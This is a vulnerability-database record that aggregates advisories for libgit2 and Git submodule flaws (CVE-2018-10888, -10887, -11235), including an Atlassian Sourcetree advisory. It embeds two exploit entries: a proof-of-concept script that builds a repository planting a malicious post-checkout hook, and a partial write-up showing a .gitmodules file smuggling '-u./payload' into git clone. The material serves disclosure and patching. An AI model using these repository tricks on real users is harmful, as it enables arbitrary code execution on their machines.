"ubuntucve": [{"lastseen": "2021-11-22T21:35:38", "description": "A flaw was found in libgit2 before version 0.27.3. A missing check in\ngit_delta_apply function in delta.c file, may lead to an out-of-bound read\nwhile reading a binary delta file. An attacker may use this flaw to cause a\nDenial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10888", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10888"], "modified": "2018-07-10T00:00:00", "id": "UB:CVE-2018-10888", "href": "https://ubuntu.com/security/CVE-2018-10888", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-22T21:35:38", "description": "A flaw was found in libgit2 before version 0.27.3. It has been discovered\nthat an unexpected sign extension in git_delta_apply function in delta.c\nfile may lead to an integer overflow which in turn leads to an out of bound\nread, allowing to read before the base object. 
An attacker may use this\nflaw to leak memory addresses or cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.2}, "published": "2018-07-10T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10887", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887"], "modified": "2018-07-10T00:00:00", "id": "UB:CVE-2018-10887", "href": "https://ubuntu.com/security/CVE-2018-10887", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2021-11-22T21:36:03", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x\nbefore 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur.\nWith a crafted .gitmodules file, a malicious project can execute an\narbitrary script on a machine that runs \"git clone --recurse-submodules\"\nbecause submodule \"names\" are obtained from this file, and then appended to\n$GIT_DIR/modules, leading to directory traversal with \"../\" in a name.\nFinally, post-checkout hooks from a submodule are executed, bypassing the\nintended design in which hooks are not obtained from a remote server.", "cvss3": {"exploitabilityScore": 1.8, 
"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-30T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-30T00:00:00", "id": "UB:CVE-2018-11235", "href": "https://ubuntu.com/security/CVE-2018-11235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T06:00:13", "description": "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. 
An attacker may use this flaw to cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-10T14:29:00", "type": "debiancve", "title": "CVE-2018-10888", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10888"], "modified": "2018-07-10T14:29:00", "id": "DEBIANCVE:CVE-2018-10888", "href": "https://security-tracker.debian.org/tracker/CVE-2018-10888", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T06:00:13", "description": "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. 
An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-07-10T14:29:00", "type": "debiancve", "title": "CVE-2018-10887", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887"], "modified": "2018-07-10T14:29:00", "id": "DEBIANCVE:CVE-2018-10887", "href": "https://security-tracker.debian.org/tracker/CVE-2018-10887", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-07-04T05:59:02", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs \"git clone --recurse-submodules\" because submodule \"names\" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with \"../\" in a name. 
Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-30T04:29:00", "type": "debiancve", "title": "CVE-2018-11235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2018-05-30T04:29:00", "id": "DEBIANCVE:CVE-2018-11235", "href": "https://security-tracker.debian.org/tracker/CVE-2018-11235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-19T20:09:06", "description": "A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. 
An attacker may use this flaw to cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-10T14:29:00", "type": "cve", "title": "CVE-2018-10888", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10888"], "modified": "2022-04-19T16:09:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-10888", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10888", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-19T20:09:09", "description": "A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. 
An attacker may use this flaw to leak memory addresses or cause a Denial of Service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2018-07-10T14:29:00", "type": "cve", "title": "CVE-2018-10887", "cwe": ["CWE-125", "CWE-190", "CWE-681"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887"], "modified": "2022-04-19T16:07:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:debian:debian_linux:8.0"], "id": "CVE-2018-10887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10887", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:16:44", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. 
With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs \"git clone --recurse-submodules\" because submodule \"names\" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with \"../\" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-05-30T04:29:00", "type": "cve", "title": "CVE-2018-11235", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11235"], "modified": "2020-05-02T00:15:00", "cpe": ["cpe:/a:git-scm:git:2.15.1", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0", "cpe:/o:canonical:ubuntu_linux:17.10", 
"cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/a:git-scm:git:2.13.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:git-scm:git:2.17.0", "cpe:/a:git-scm:git:2.16.3", "cpe:/a:git-scm:git:2.14.3", "cpe:/a:gitforwindows:git:2.17.1"], "id": "CVE-2018-11235", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:17.10:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.17.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:gitforwindows:git:2.17.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.13.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:git-scm:git:2.15.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe:2.3:a:git-scm:git:2.16.3:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-06-01T23:14:40", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-06-01T00:00:00", "type": "zdt", "title": "Git < 2.17.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-01T00:00:00", "id": "1337DAY-ID-30518", "href": "https://0day.today/exploit/description/30518", "sourceData": "", "sourceHref": "https://0day.today/exploit/30518", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T02:14:40", "description": "Sourcetree suffers from multiple remote code execution 
vulnerabilities related to git submodules and argument injection. macOS versions 1.0b2 up to 2.7.6 and Windows versions 0.5.1.0 up to 2.6.10 are affected.", "cvss3": {}, "published": "2018-07-25T00:00:00", "type": "zdt", "title": "Sourcetree Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-13386", "CVE-2018-11235", "CVE-2018-13385"], "modified": "2018-07-25T00:00:00", "id": "1337DAY-ID-30774", "href": "https://0day.today/exploit/description/30774", "sourceData": "Sourcetree Remote Code Execution Exploit\r\n\r\nCVE ID:\r\n\r\n* CVE-2018-11235.\r\n* CVE-2018-13385.\r\n* CVE-2018-13386.\r\n\r\n\r\nProduct: Sourcetree.\r\n\r\nAffected Sourcetree product versions:\r\n\r\n* for macOS, 1.0b2 <= version < 2.7.6\r\n* for Windows, 0.5.1.0 <= version < 2.6.10\r\n\r\n\r\nFixed Sourcetree product versions:\r\n\r\n* for macOS, Sourcetree 2.7.6 has been released with a fix for these issues.\r\n* for Windows, Sourcetree 2.6.10 has been released with a fix for these issues.\r\n\r\n\r\nSummary:\r\nThis advisory discloses critical severity security vulnerabilities. Versions of\r\nSourcetree are affected by these vulnerabilities.\r\n\r\n\r\n\r\nCustomers who have upgraded Sourcetree to version 2.7.6 (Sourcetree for macOS)\r\nor 2.6.10 (Sourcetree for Windows) are not affected.\r\n\r\nCustomers who have downloaded and installed Sourcetree >= 1.0b2 but less than\r\n2.7.6 (the fixed version for macOS) or who have downloaded and installed\r\nSourcetree >= 0.5.1.0 but less than 2.6.10 (the fixed version for\r\nWindows) please\r\nupgrade your Sourcetree installations immediately to fix these vulnerabilities.\r\n\r\n\r\n\r\nSourcetree for macOS - Git submodules vulnerability (CVE-2018-11235)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. 
The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThe embedded version of Git used in Sourcetree for macOS was vulnerable to\r\nCVE-2018-11235. An attacker can exploit this issue if they can commit to a Git\r\nrepository linked in Sourcetree for macOS or that has been recursively cloned or\r\nif a user interacts with a submodule. This allows them to execute arbitrary code\r\non systems running a vulnerable version of Sourcetree for macOS.\r\nVersions of Sourcetree for macOS starting with version 1.02b before version\r\n2.7.4 are affected by this vulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREE-5845 .\r\n\r\nSourcetree for Windows - Git submodules vulnerability (CVE-2018-11235)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThe embedded version of Git used in Sourcetree for Windows was vulnerable to\r\nCVE-2018-11235. An attacker can exploit this issue if they can commit to a Git\r\nrepository linked in Sourcetree for Windows or that has been recursively cloned\r\nor if a user interacts with a submodule. This allows them to execute arbitrary\r\ncode on systems running a vulnerable version of Sourcetree for Windows.\r\nVersions of Sourcetree for Windows starting with version 0.5.1.0 before version\r\n2.6.10 are affected by this vulnerability. 
This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREEWIN-8882 .\r\n\r\nSourcetree for macOS - Argument injection via Mercurial repository filenames\r\n(CVE-2018-13385)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThere was an argument injection vulnerability in Sourcetree for macOS via\r\nfilenames in Mercurial repositories. An attacker with permission to commit to a\r\nMercurial repository linked in Sourcetree for macOS is able to exploit this\r\nissue to gain code execution on the system.\r\nVersions of Sourcetree for macOS before version 2.7.6 are affected by this\r\nvulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREE-5846 .\r\n\r\nSourcetree for Windows - Argument injection via Mercurial repository filenames\r\n(CVE-2018-13386)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical, according\r\nto the scale published in our Atlassian severity levels. The scale allows us to\r\nrank the severity as critical, high, moderate or low.\r\nThis is our assessment and you should evaluate its applicability to your own IT\r\nenvironment.\r\n\r\n\r\nDescription:\r\n\r\nThere was an argument injection vulnerability in Sourcetree for Windows via\r\nfilenames in Mercurial repositories. An attacker with permission to commit to a\r\nMercurial repository linked in Sourcetree for Windows is able to exploit this\r\nissue to gain code execution on the system.\r\nVersions of Sourcetree for Windows before version 2.6.10 are affected by this\r\nvulnerability. 
This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/SRCTREEWIN-8884 .\r\n\r\n\r\n\r\nFix:\r\n\r\nTo address these issues, we've released the following versions containing a\r\nfix:\r\n\r\n* Sourcetree for macOS version 2.7.6\r\n* Sourcetree for Windows version 2.6.10\r\n\r\nRemediation:\r\n\r\nUpgrade Sourcetree for Windows to version 2.6.10 or higher.\r\n\r\nThe vulnerabilities and fix versions are described above. If affected, you\r\nshould upgrade to the latest version immediately.\r\n\r\nIf you are running Sourcetree macOS and cannot upgrade to 2.6.10 (Sourcetree for\r\nWindows), upgrade to version 2.7.6.\r\n\r\n\r\nFor a full description of the latest version of Sourcetree, see the release\r\nnotes found at https://www.sourcetreeapp.com/update/releasenotes/2.7.6.html.\r\nYou can download the latest version of Sourcetree from the download centre\r\nfound at https://www.sourcetreeapp.com/.\r\n\r\nAcknowledgements:\r\nAtlassian would like to credit Etienne Stalmans and Terry Zhang at Tophant for\r\nreporting these issues to us.\n\n# 0day.today [2018-07-25] #", "sourceHref": "https://0day.today/exploit/30774", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-06-05T01:34:31", "description": "", "cvss3": {}, "published": "2018-06-01T00:00:00", "type": "packetstorm", "title": "Git Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2018-06-01T00:00:00", "id": "PACKETSTORM:148010", "href": "https://packetstormsecurity.com/files/148010/Git-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Git (code execution) \n# Date: 2018-05-29 \n# Exploit Author: JameelNabbo \n# Website: jameelnabbo.com <http://jameelnabbo.com/> \n# Vendor Homepage: https://github.com/git/git <https://github.com/git/git> \n# CVE: CVE-2018-11235 \n#Version: <=2.17.1 \n# Tested on Kali Linux \n \n \nP0C: \n \nCreate two files: 
\npwned.sh: the file which will contain our commands to be executed \ncommit.sh the file which contain a normal build with a bit of calls to our pwned.sh file \n \nadd the following to Pwned.sh: \n#!/bin/sh \ncat << EOF \n \n#here we can put our lovely commands \nExploited! : $(ifconfig) \n \nEOF \n \n#-------- \n \nAdd the following to commit.sh file: \n#!/bin/sh \n \nset -e \n \nrepo_dir=\"$PWD/repo\" \n#change it to any other Repo \nrepo_submodule='https://github.com/JameelNabbo/SmartWorm' \n \ngit init \"$repo_dir\" \ncd \"$repo_dir\" \ngit submodule add \"$repo_submodule\" pwned \nmkdir modules \ncp -r .git/modules/pwned modules \ncp ../pwned.sh modules/pwned/hooks/post-checkout \ngit config -f .gitmodules submodule.pwned.update checkout \ngit config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned \ngit add modules \ngit submodule add \"$repo_submodule\" \ngit add SmartWorm \ngit commit -am pwned \necho \"All done, now \\`git clone --recurse-submodules \\\"$repo_dir\\\" dest_dir\\`a \n \n \naaaaaa \nSolution: \nhttps://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/148010/git-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-17T18:18:51", "description": "", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "packetstorm", "title": "Git Submodule Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-17T00:00:00", "id": "PACKETSTORM:149836", "href": "https://packetstormsecurity.com/files/149836/Git-Submodule-Arbitrary-Code-Execution.html", "sourceData": "`# CVE-2018-17456 \n \nI've gotten a couple of questions about exploitation for the \n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we \ngo with some technical details. 
\n \n## TL;DR \n \n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository. \nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip \n \n## Exploitation \n \nThe `.gitmodules` file looks as follows: \n \n``` \n[submodule \"x:x\"] \npath = x:x \nurl = -u./payload \n``` \n \nThe actual command being injected is set by the url, `-u./payload` \npoints the `upload-pack` flag of git clone to the `payload` shell \nscript. Note also the `:` within the path, this part is needed to \nactually get the `payload` script executed. \n \nThe path will end up as the repository URL in the subsequent `clone` \noperation: \n \n``` \nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\", \n\"--no-checkout\", \"--progress\", \"--separate-git-dir\", \n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],... \n``` \n \nAs the actual URL from `.gitmodules` is interpreted as the `-u` \nargument. \n \nThe colon is due to the fact that the colon character lets us go past \nthose lines in `transport.c`: \n \n```c \n} else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) { \nstruct bundle_transport_data *data = xcalloc(1, sizeof(*data)); \ntransport_check_allowed(\"file\"); \nret->data = data; \nret->vtable = &bundle_vtable; \nret->smart_options = NULL; \n``` \n \n`url_is_local_not_ssh` will return false due to the colon \nin the path. And therefore later on in the code the smart_options \ncontaining the `uploadpack` setting are still in place: \n \n```c \n} else { \n/* Unknown protocol in URL. Pass to external handler. 
